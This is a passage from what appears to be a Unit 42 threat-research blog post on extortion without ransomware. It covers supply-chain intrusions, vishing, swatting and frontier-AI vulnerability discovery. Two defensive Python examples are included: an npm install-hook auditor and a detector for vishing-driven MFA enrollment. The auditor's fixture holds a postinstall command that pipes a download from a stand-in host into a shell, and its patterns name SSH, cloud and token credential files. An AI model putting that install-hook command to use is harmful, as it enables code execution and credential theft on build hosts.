- What: Analysis of evolving cyber extortion trends
- Impact: Organizations face new threats from data theft and extortion without ransomware
Out of the Crypt: The Evolving Cyber Extortion Economy

By: Matt Brady, Justin Moore
Published: May 27, 2026
Categories: Cybercrime, General, Insights
Tags: Bling Libra, Extortion, Frontier AI, Hazy Scorpius, Scattered LAPSUS$ Hunters, ShinyHunters, Supply chain, Telegram, TGR-CRI-1135

Extortion Activity No Longer Requires Encryption for Payment

This blog examines the growing trend of data theft and extortion operations that no longer rely on ransomware to pressure victims into paying a demand. We look at the financially motivated threat actors using both single and double extortion techniques and at what this means for organizations going forward, especially with the arrival of frontier AI models.

Shifting Threat Landscape Observations

As detailed in our 2026 Global Incident Response Report, Unit 42 observed a notable decrease in the use of encryption in extortion-related cases last year. The share of cases involving encryption dropped to 78% in 2025, well below the near-or-above-90% levels observed between 2021 and 2024. Other security organizations have seen similar trends: Google reported a gradual rise in data theft and extortion incidents from approximately 2% in 2020 to 15% in 2025, and Resilience observed extortion-only incidents rising from 49% in the first half of 2025 to 65% in the second half. Threat actors tracked by Unit 42 that have demonstrated a willingness to shift from ransomware to pure data theft and extortion include Bling Libra (aka ShinyHunters), with its focus on software-as-a-service (SaaS) applications, and Hazy Scorpius (aka CLOP), with its exploitation of an Oracle EBS vulnerability.
When examining this precipitous drop in encryption, we see four primary drivers:
- Advanced backup and recovery performance, which allows routine re-imaging and restoration
- Endpoint maturity and the efficacy of automated disruption
- Exfiltration speed
- Increased pressure from regulatory frameworks, where non-compliance fines, class-action lawsuits and systemic reputational damage offer greater leverage than operational downtime

In 2025, pure data-exfiltration campaigns heavily targeted Professional Services, Healthcare and Consumer Services firms, with threat actors focusing on mid-sized organizations, which accounted for 64% of victims. Interestingly, while Manufacturing remains the single most disrupted sector overall, Construction has seen a 44% year-over-year increase as a data-only extortion hotspot. These firms are attractive targets because lucrative financial blueprints and bidding data are combined with weak data egress controls.

The current data-only extortion economy is directly fueled by a heavily regulated compliance landscape that threat actors have effectively weaponized. Strict mandates such as the SEC's four-business-day disclosure window and GDPR's 72-hour reporting rule have created a regulatory countdown clock that lets threat actors force rapid negotiations before organizations can complete internal assessments. Because global privacy frameworks, state-level breach notification laws and post-leak class-action litigation have driven the average cost of data-theft extortion to $5.08 million (and over $10 million for broader U.S. breaches), data exposure alone carries disastrous financial liabilities. Threat actors recognize that regulatory penalties are severe enough that the compliance framework itself compels corporate payouts. Paying does not discharge these obligations, however: a confirmed exfiltration of personal data is generally still a reportable breach, whatever the attacker promises about deleting it. As our Chief Security Intelligence Officer, Wendi Whitmore, recently noted, in one case it took threat actors only 39 seconds to move from initial access to data exfiltration.
Differences in Extortion Operations

Unit 42 is actively monitoring several threat actors that are continuously conducting data theft and extortion operations. The notable differences between these attackers are their initial access techniques and the number of extortion techniques they use to pressure victims into payment.

Initial Access via Software Supply Chain Compromise

TGR-CRI-1135 (aka TeamPCP) has been active since at least late 2025. According to Wired, this group has conducted upwards of 20 distinct supply chain compromise attacks, injecting malicious code into over 500 pieces of software. We reported on the group's activities earlier this year, including how its malware successfully exfiltrated sensitive secrets (cloud access tokens, SSH keys, Kubernetes secrets) from victims. In recent months, TGR-CRI-1135 has been partnering with various ransomware-as-a-service (RaaS) and extortion-as-a-service (EaaS) operators to monetize its ongoing intrusion activity. On the EaaS front, it has collaborated with the operators of LAPSUS$ Group to extort targeted organizations via that group's data leak site, as shown in Figure 1.

Figure 1. Screenshot of LAPSUS$ DLS post on May 21, 2026. Source: Dark Web Informer.

On the RaaS front, it has been working with the operators of Vect ransomware, based on communications observed on the BreachForums cybercrime forum, as shown in Figure 2. Unit 42 is also aware of claims by one of Vect's affiliates, the Rostova Organization, that it too is partnering with TGR-CRI-1135.

Figure 2. Screenshot from HasanBroker's BreachForums post on March 25, 2026. Source: Unit 42.

On May 13, 2026, TGR-CRI-1135 announced the release of an open source version of Shai-Hulud on BreachForums, as shown in Figure 3.
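The supply chain intrusions described above monetize secrets harvested from the hosts that install the trojanized packages. The following is an added example for this article, not Unit 42 code and not TGR-CRI-1135 tooling: it audits an installed package tree for install-time lifecycle hooks and flags the ones that touch credential stores or fetch and execute remote content. It assumes an npm-style ecosystem (package.json "scripts" with preinstall/install/postinstall hooks), which is the mechanism the original Shai-Hulud npm worm abused; the package tree it scans, the package names and the suspicious-pattern list are all constructed for the demo.

```python
"""Audit an installed node_modules tree for install-time lifecycle scripts.

Added example for this article; it is not Unit 42 code and not TGR-CRI-1135
tooling. It assumes an npm-style ecosystem (package.json "scripts" with
preinstall/install/postinstall hooks), the mechanism the original Shai-Hulud
npm worm abused. The package tree it scans is constructed in a temp directory.
"""
import json
import os
import re
import tempfile

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Things an install hook rarely needs legitimately: credential stores on the
# build host, or fetching and executing remote content at install time.
SUSPICIOUS = [
    (r"\.ssh/|id_rsa|id_ed25519", "reads SSH key material"),
    (r"\.aws/credentials|AWS_SECRET_ACCESS_KEY", "reads cloud credentials"),
    (r"\.kube/config|KUBECONFIG", "reads Kubernetes config"),
    (r"\.npmrc|NPM_TOKEN|GITHUB_TOKEN", "reads registry/VCS tokens"),
    (r"\bcurl\b|\bwget\b", "fetches remote content"),
    (r"\bnode\s+-e\b|\bbash\s+-c\b|\bsh\s+-c\b|\beval\b", "executes inline code"),
]


def audit_scripts(scripts):
    """Return one finding per lifecycle hook present in a package's scripts dict."""
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        reasons = [why for pat, why in SUSPICIOUS if re.search(pat, cmd)]
        findings.append({
            "hook": hook,
            "command": cmd,
            "severity": "high" if reasons else "info",  # every hook is worth a look
            "reasons": reasons,
        })
    return findings


def audit_tree(root):
    """Walk every package.json under root and collect findings by package name."""
    results = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        path = os.path.join(dirpath, "package.json")
        with open(path, encoding="utf-8") as f:
            try:
                pkg = json.load(f)
            except json.JSONDecodeError:
                continue
        findings = audit_scripts(pkg.get("scripts") or {})
        if findings:
            results[pkg.get("name", path)] = findings
    return results


def build_demo_tree():
    """Constructed sample tree: one hook-free package, one legitimate native
    build hook, and one package whose postinstall fetches and runs remote code."""
    root = tempfile.mkdtemp(prefix="nm_demo_")
    manifests = [
        {"name": "left-pad-ish", "version": "1.0.0",
         "scripts": {"test": "node test.js"}},
        {"name": "native-thing", "version": "0.4.0",
         "scripts": {"install": "node-gyp rebuild"}},
        {"name": "totally-fine-util", "version": "2.3.1",
         "scripts": {"postinstall":
                     "node -e \"require('child_process').execSync('curl -s https://example.invalid/s | sh')\""}},
    ]
    for m in manifests:
        pkg_dir = os.path.join(root, "node_modules", m["name"])
        os.makedirs(pkg_dir)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as f:
            json.dump(m, f)
    return root


if __name__ == "__main__":
    for name, findings in audit_tree(build_demo_tree()).items():
        for fnd in findings:
            print(f"[{fnd['severity']:4}] {name} {fnd['hook']}: {fnd['command']}")
            for why in fnd["reasons"]:
                print(f"        - {why}")
```

Point audit_tree at a real project directory to scan what is already on disk. The audit is after the fact by design: any hook that ran on a build host or developer machine has already had access to whatever that host held, so a high-severity hit should trigger rotation of the tokens and keys present there, not just removal of the package. In CI, installing with scripts disabled (npm ci --ignore-scripts) and pinning a lockfile removes the execution opportunity in the first place.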
Going forward, as noted in our most recent threat research article, this will likely make attribution more difficult, since copycats may use the tool in similar supply chain compromise attacks.

Figure 3. Screenshot from BreachForums post on May 13, 2026. Source: Unit 42.

One notable development related to Vect was the announcement on BreachForums shown in Figure 4, which states that its operators have been removed from the forum. It is unclear whether this will have a material effect on their collaboration with TGR-CRI-1135 going forward.

Figure 4. Screenshot from Resolute's BreachForums post on May 21, 2026. Source: Unit 42.

At this time, Unit 42 is not aware of TGR-CRI-1135 using any extortion technique beyond data exfiltration itself to pressure victims into paying its ransom demands.

Initial Access via Vishing

Bling Libra continues its campaign of infiltrating customer SaaS tenants for data theft and extortion operations, which Unit 42 reported on extensively in 2025. The operators have distanced themselves from the cybercriminal alliance known as Scattered LAPSUS$ Hunters, based on a Telegram message shown in Figure 5.

Figure 5. Screenshot from the "scattered LAPSUS$ hunters part 7" chat on May 11, 2026. Source: Telegram.

However, their playbook has remained largely unchanged based on Unit 42 observations. They continue to use vishing for initial access, directing unsuspecting victims to phishing sites designed to intercept user credentials and multifactor authentication (MFA) codes, and they ultimately register their own devices to establish persistence in the targeted environment. Because one-time codes and push approvals can be relayed in real time, this technique is defeated only by phishing-resistant MFA (FIDO2/WebAuthn), which binds the authentication to the legitimate origin; new-device and new-factor enrollments shortly after a sign-in from an unfamiliar location are the events to alert on. The operators still use the same Tox ID to communicate with victims and maintain a Tor-based data leak site. In comparison to TGR-CRI-1135, Bling Libra uses additional extortion techniques beyond pure data theft to pressure victims into paying a ransom.
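The vishing playbook above leaves a recognizable trace in identity logs: a successful MFA sign-in from an IP the user has never used, followed within minutes by registration of a new device or enrollment of a new factor. The following is an added example for this article, not Unit 42 detection content, that correlates those two events per user. The event schema, the field names, the sample events and the known-IP baseline are all constructed for the demo; real IdP logs (Okta System Log, Entra ID sign-in and audit logs) carry the same facts under different names.

```python
"""Correlate identity events for the vishing-to-persistence pattern: a
successful MFA sign-in from an IP the user has never used, followed within an
hour by enrollment of a new MFA factor or registration of a new device.

Added example for this article, not Unit 42 detection content. The event
schema, the baseline and the events are constructed; real IdP logs carry the
same facts under different field names.
"""
from collections import defaultdict
from datetime import datetime, timedelta

PERSISTENCE_EVENTS = {"factor.enroll", "device.register"}
WINDOW = timedelta(minutes=60)

# Constructed sample events. "bob" is the vishing victim: the attacker relays
# his password and MFA code through a phishing page, signs in from their own
# IP, then registers a device and enrolls a factor they control. The last
# event for bob is outside the window and should not alert.
EVENTS = [
    {"ts": "2026-05-11T09:02:10Z", "user": "alice", "event": "login.success", "ip": "203.0.113.10", "mfa": True},
    {"ts": "2026-05-11T09:40:00Z", "user": "alice", "event": "factor.enroll", "ip": "203.0.113.10", "factor": "push"},
    {"ts": "2026-05-11T10:15:32Z", "user": "bob", "event": "login.success", "ip": "198.51.100.7", "mfa": True},
    {"ts": "2026-05-11T10:17:05Z", "user": "bob", "event": "device.register", "ip": "198.51.100.7", "device": "iPhone"},
    {"ts": "2026-05-11T10:18:40Z", "user": "bob", "event": "factor.enroll", "ip": "198.51.100.7", "factor": "totp"},
    {"ts": "2026-05-11T11:00:00Z", "user": "carol", "event": "login.success", "ip": "192.0.2.44", "mfa": True},
    {"ts": "2026-05-11T14:30:00Z", "user": "bob", "event": "factor.enroll", "ip": "198.51.100.7", "factor": "sms"},
]

# Constructed baseline: IPs each user had signed in from before this window.
KNOWN_IPS = {"alice": {"203.0.113.10"}, "bob": {"203.0.113.22"}, "carol": {"192.0.2.44"}}


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def detect(events, known_ips, window=WINDOW):
    """Return one alert per persistence event that follows a new-IP MFA sign-in
    by the same user within `window`. Events may arrive in any order."""
    alerts = []
    new_ip_logins = defaultdict(list)  # user -> [(login_ts, ip)]
    for ev in sorted(events, key=lambda e: parse_ts(e["ts"])):
        ts, user = parse_ts(ev["ts"]), ev["user"]
        if ev["event"] == "login.success" and ev.get("mfa"):
            # Only sign-ins that actually passed MFA matter: that is the moment
            # the relayed code was consumed by the attacker's session.
            if ev["ip"] not in known_ips.get(user, set()):
                new_ip_logins[user].append((ts, ev["ip"]))
        elif ev["event"] in PERSISTENCE_EVENTS:
            for login_ts, ip in new_ip_logins[user]:
                delta = ts - login_ts
                if timedelta(0) <= delta <= window:
                    alerts.append({
                        "user": user,
                        "login_ip": ip,
                        "login_ts": login_ts.isoformat() + "Z",
                        "persistence": ev["event"],
                        "seconds_after_login": int(delta.total_seconds()),
                    })
                    break  # one alert per persistence event is enough
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS, KNOWN_IPS):
        print(f"{a['user']}: {a['persistence']} {a['seconds_after_login']}s after "
              f"new-IP MFA login from {a['login_ip']} at {a['login_ts']}")
```

In production the baseline should be keyed on ASN, geography or device fingerprint rather than raw IP, since the attacker's first sign-in may come from a residential proxy. An alert here is a strong signal that the new factor belongs to the attacker: the response is to revoke the user's sessions, remove the newly enrolled factor and device, and re-verify the user out of band, not to wait for the data leak site post.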
Unit 42 is aware of their adoption of both distributed denial-of-service (DDoS) attacks and information leaks to media outlets as added leverage points to extort victims.

By contrast, an activity cluster tracked by Unit 42 as CL-CRI-1116, which overlaps with public reporting on BlackFile, has followed a similar playbook-driven approach with some subtle and not-so-subtle differences. While the attackers behind CL-CRI-1116 also use their own Tor-based data leak site, they do not reuse the same Tox ID across victims and typically use a different registrar than Bling Libra to set up their phishing sites. The major difference between CL-CRI-1116 and Bling Libra is the former's use of swatting employees as a double extortion technique. Swatting is typically defined as placing a false emergency call to first responders, such as reporting a fake crime at a specific location, to trigger a physical response. In many cases this is intended to create chaos and can potentially lead to acts of violence. This convergence of cyber and physical security can cause complications if the two teams are not in regular communication about how to handle such a situation, especially as it pertains to executive protection.

One recent development regarding the attackers behind CL-CRI-1116 is the closure of their former data leak site and the rebranding of their program under the name "Redact", with a new data leak site, as shown in Figures 6 and 7.

Figure 6. Screenshot from BlackFile data leak site post on May 11, 2026. Source: Unit 42.

Figure 7. Screenshot from BlackFile data leak site post on May 19, 2026. Source: Unit 42.

Looking Forward

In recent weeks, Palo Alto Networks has been at the forefront of providing guidance to organizations on how to secure their environments against the inevitable weaponization of frontier AI models like Mythos by threat actors.
These models already accelerate the discovery and chaining of vulnerabilities to exploit flaws in applications and infrastructure alike. For example, Anthropic recently disclosed that Mythos identified approximately 23,000 potential vulnerabilities across 1,000 open source software projects. We have also observed, in AI-assisted scenarios, that the time from initial access to data exfiltration has dropped to as little as 25 minutes. With this in mind, what do extortion activities, regardless of initial access vector or the use of single vs. double techniques, look like in the age of frontier AI models? In terms of softw